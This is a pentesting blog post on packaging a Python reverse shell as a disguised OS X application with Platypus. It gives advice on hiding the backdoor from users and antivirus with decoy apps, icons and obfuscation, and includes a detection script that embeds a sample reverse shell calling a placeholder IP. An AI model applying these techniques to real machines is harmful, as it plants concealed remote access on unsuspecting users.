Native Mac OS X Application / Mach-O Backdoors for Pentesters

Back in the day, Dave Kennedy made a great post in which he released a script called PyBuild and a simple Python reverse shell. Together they let pentesters write shells and/or malware in Python and compile them down to a native executable (a PE) for Windows systems. This is useful for a number of reasons, chiefly ending up with a single self-contained executable and bypassing antivirus. Today I'm going to demonstrate the same technique on OS X, building a Python backdoor down to a native application bundle.

To start, I've been writing my own custom pieces with this method, but for today we are going to use an updated Python shell written by Dave Kennedy. That zip file comes with server.py, shell.py, and shell.exe. What we will be doing is building shell.py into an application bundle, which lets us use it just as we would shell.exe, only on Mac OS X systems. This can be done from the command line with a tool such as pyinstaller, but we will be using Platypus for ease of use. Note that Platypus does not compile the script: it wraps it in an app bundle with a native launcher that hands the script to the interpreter at run time, so the target still needs /usr/bin/python present (which OS X of this era ships by default). Simply configure the program as shown below:


Now you can either double-click the app to launch the backdoor, or step into the app package and call the Mach-O executable directly. Either way the app will execute, your Python script will run, and you will get a callback. Leave "Output" set to "None"; this suppresses any prompts or windows when the app runs. Without "Run in background" checked, the app will show an icon in the Dock while it runs, so check "Run in background". Picking a legitimate-looking .icns file helps avoid alerting the user, although if you're trying to keep the size down you can skip the image. Along the same lines, it may help to have the script launch a seemingly legitimate application, or display a plausible notice, when the user opens it, so nothing visibly fails. Without "Secure bundled script" checked, a verbatim copy of the script you built into the executable is kept in the application bundle under the Resources directory, so check "Secure bundled script". Even then, that option only lightly obscures the script rather than protecting it, so it also helps to obfuscate your script and/or take other steps to hide the backdoor, as this is pretty easy to reverse by default.
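The Platypus options above each leave a trace on disk, and the same traces are what an analyst looking at a suspicious bundle will pull first. The following is an added example written for this post, not code from Platypus or from Dave Kennedy's shell.py/server.py. It inspects a .app bundle for the key that "Run in background" sets in Info.plist (LSUIElement), for a readable Contents/Resources/script left behind when "Secure bundled script" is unchecked, and for the socket/subprocess calls a Python reverse shell can hardly avoid. The bundle layout and plist key names are assumptions based on what Platypus produces; the sample script and the bundles built in the temp directory are constructed for the demo and contain no working shell.

```python
"""Inspect a .app bundle for the traces a Platypus-wrapped Python script leaves.

Added example for this post; not code from Platypus or from shell.py/server.py.
Assumed layout (matches Platypus output, but treat key names as assumptions):
Contents/Info.plist, a native launcher under Contents/MacOS/, and the bundled
script stored verbatim as Contents/Resources/script.
"""
import os
import plistlib
import tempfile

# Tokens a Python reverse shell can hardly avoid.
SUSPICIOUS_TOKENS = (b"socket", b"subprocess", b"os.dup2", b"pty.spawn", b"connect(")

# Constructed stand-in for shell.py: it has the shape of a reverse shell but is not one.
SAMPLE_SCRIPT = b"""#!/usr/bin/python
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.0.2.10", 443))
os.dup2(s.fileno(), 0)
subprocess.call(["/bin/sh", "-i"])
"""

# Constructed stand-in for a script saved with "Secure bundled script": no shebang,
# not readable as source.
OBFUSCATED_BLOB = b"\x00\x02\x7fPLATYPUS\x15\xa3\x91\x0c..."


def read_plist(path):
    """Load a plist, returning {} when it is missing or unreadable."""
    try:
        with open(path, "rb") as fh:
            return plistlib.load(fh)
    except (OSError, plistlib.InvalidFileException):
        return {}


def plist_flag(info, key):
    """Treat <true/>, 1 or "1"/"YES" as set; Info.plist authors use all of them."""
    value = info.get(key, False)
    if isinstance(value, bool):
        return value
    return str(value).strip().lower() in ("1", "true", "yes")


def suspicious_calls(script_bytes):
    """Return the networking/process tokens present in a script body."""
    return [t.decode() for t in SUSPICIOUS_TOKENS if t in script_bytes]


def inspect_bundle(app_path):
    """Collect the indicators an analyst would pull from one bundle."""
    contents = os.path.join(app_path, "Contents")
    info = read_plist(os.path.join(contents, "Info.plist"))
    script_path = os.path.join(contents, "Resources", "script")
    result = {
        "executable": info.get("CFBundleExecutable"),
        "hidden_from_dock": plist_flag(info, "LSUIElement"),  # "Run in background"
        "has_icon": bool(info.get("CFBundleIconFile")),
        "plaintext_script": False,
        "shebang": None,
        "calls": [],
    }
    if os.path.isfile(script_path):
        with open(script_path, "rb") as fh:
            body = fh.read()
        first_line = body.split(b"\n", 1)[0]
        # A readable shebang means "Secure bundled script" was left unchecked.
        if first_line.startswith(b"#!"):
            result["plaintext_script"] = True
            result["shebang"] = first_line.decode(errors="replace").strip()
            result["calls"] = suspicious_calls(body)
    return result


def looks_like_backdoor(result):
    """Hidden from the Dock, script readable, and at least two shell-ish calls."""
    return result["hidden_from_dock"] and result["plaintext_script"] and len(result["calls"]) >= 2


def make_sample_bundle(app_path, hide=True, secure=False):
    """Write a constructed bundle mimicking Platypus output (the launcher is a stub)."""
    name = os.path.splitext(os.path.basename(app_path))[0]
    macos_dir = os.path.join(app_path, "Contents", "MacOS")
    resources = os.path.join(app_path, "Contents", "Resources")
    os.makedirs(macos_dir)
    os.makedirs(resources)
    info = {"CFBundleExecutable": name, "CFBundleIconFile": "AppIcon.icns"}
    if hide:
        info["LSUIElement"] = True  # assumption: the key "Run in background" sets
    with open(os.path.join(app_path, "Contents", "Info.plist"), "wb") as fh:
        plistlib.dump(info, fh)
    with open(os.path.join(macos_dir, name), "wb") as fh:
        fh.write(b"")  # stand-in for the Mach-O launcher
    with open(os.path.join(resources, "script"), "wb") as fh:
        fh.write(OBFUSCATED_BLOB if secure else SAMPLE_SCRIPT)
    return app_path


def demo():
    """Build one noisy and one quieter constructed bundle and inspect both."""
    root = tempfile.mkdtemp(prefix="platypus_demo_")
    noisy = inspect_bundle(make_sample_bundle(os.path.join(root, "Updater.app")))
    quiet = inspect_bundle(make_sample_bundle(os.path.join(root, "Helper.app"), hide=False, secure=True))
    return noisy, quiet


if __name__ == "__main__":
    for label, res in zip(("noisy", "quiet"), demo()):
        print(label, looks_like_backdoor(res), res)
```

Point inspect_bundle at a real Platypus-built app to see which of your choices in the dialog survive on disk; the "quiet" bundle in the demo only escapes the verdict because its script is not readable as source, which is exactly why the options above matter and why a determined analyst will still unpack it.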

Finally, you can use many of the techniques we've covered in the Mac OS X Live Forensics series to hide, persist, and further weaponize your malware, simply applying them as an attacker rather than as a forensic analyst. To get a good idea of the tricks a red teamer can pull with Python on a Mac, and for more inspiration for your malware, check out the DerbyCon talk by Josh "FuzzyNops":



Enjoy, and leave your thoughts or tips in the comments!